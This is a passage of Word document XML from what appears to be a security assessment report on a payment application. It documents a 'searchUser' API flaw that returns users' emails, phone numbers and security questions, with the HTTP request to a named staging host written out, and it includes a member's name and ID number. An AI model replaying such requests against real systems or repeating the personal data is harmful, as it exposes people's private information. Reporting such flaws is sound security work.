                <w:p w14:paraId="2ADC1EBF" w14:textId="77777777" w:rsidR="00793DD6" w:rsidRPr="00793DD6" w:rsidRDefault="00793DD6" w:rsidP="00D1715D">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00793DD6">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>[{"</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00793DD6">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>memberId</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00793DD6">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>":"Dione Robinson 751M56029</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00793DD6">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>","paymentAmount":"5.99","</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00793DD6">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>confirmationNumber":"201905313463976","paymentDate":"2019-05-31","resMessageCode":"0"</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00793DD6">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>}]</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="6FD5F540" w14:textId="77777777" w:rsidR="00793DD6" w:rsidRDefault="00793DD6" w:rsidP="00793DD6">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7E2E971A" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">The below HTTP requests and responses demonstrate the application provides functionality allowing for sensitive information to be exposed regarding a user’s data. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C67AE37" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>searchUser</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D1715D">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="109351DE" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRPr="00D1715D" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">A user is able to submit an individual username and retrieve back sensitive details about the account; including email, name, phone number, user role, organization name, and security questions. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EB87BF9" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRPr="00D1715D" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D1715D">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP Request:</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="9354"/>
            </w:tblGrid>
            <w:tr w:rsidR="00A82FF7" w:rsidRPr="00D1715D" w14:paraId="6F4D8509" w14:textId="77777777" w:rsidTr="004E4D83">
              <w:trPr>
                <w:trHeight w:val="1701"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9354" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="067906DB" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRPr="00D1715D" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>POST /</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>paymentgateway</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>loginservices</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>/v1/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>gbd</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>/account/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>searchUser</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> HTTP/1.1</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="6C08BBB9" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRPr="00D1715D" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Host: payment.sit2.va.anthem.com</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="2616A2F1" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRPr="00D1715D" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="4D75BF68" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRPr="00D1715D" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Referer</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>: https://payment.sit2.va.anthem.com/gofundhip/forgotpasswordsecurityques</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="393CDA0A" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRPr="00D1715D" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="6E8582A1" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRPr="00D1715D" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>{</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="12F141E4" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRPr="00D1715D" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">  </w:t>
                  </w:r>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>"</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>userName</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>": "</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>WNpbmc</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>=</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>anRyY</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>"</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="4C7994C7" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRPr="00D1715D" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>}</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="0BF595F2" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRPr="00D1715D" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D1715D">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Http Response:</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="9354"/>
            </w:tblGrid>
            <w:tr w:rsidR="00A82FF7" w:rsidRPr="00D1715D" w14:paraId="66802B8E" w14:textId="77777777" w:rsidTr="004E4D83">
              <w:trPr>
                <w:trHeight w:val="3506"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9354" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="67861923" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRPr="00D1715D" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:lastRenderedPageBreak/>
                    <w:t>HTTP/1.1 200 OK</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="1E7F44B6" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRPr="00D1715D" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Date: Thu, 30 May 2019 18:13:57 GMT</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="137BAA4D" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRPr="00D1715D" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="0A40F796" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Content-Length: 863</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="7966DE06" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRPr="00D1715D" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w14:paraId="7A6096A5" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRPr="00D1715D" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>{"user":{"</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>emailAddress":"</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>","username":"WNpbmc=anRyY","</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>firstName":"</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>","</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>lastName":"</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>","</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>phoneNumber":"</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>","repositoryEnum":"IAM","</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
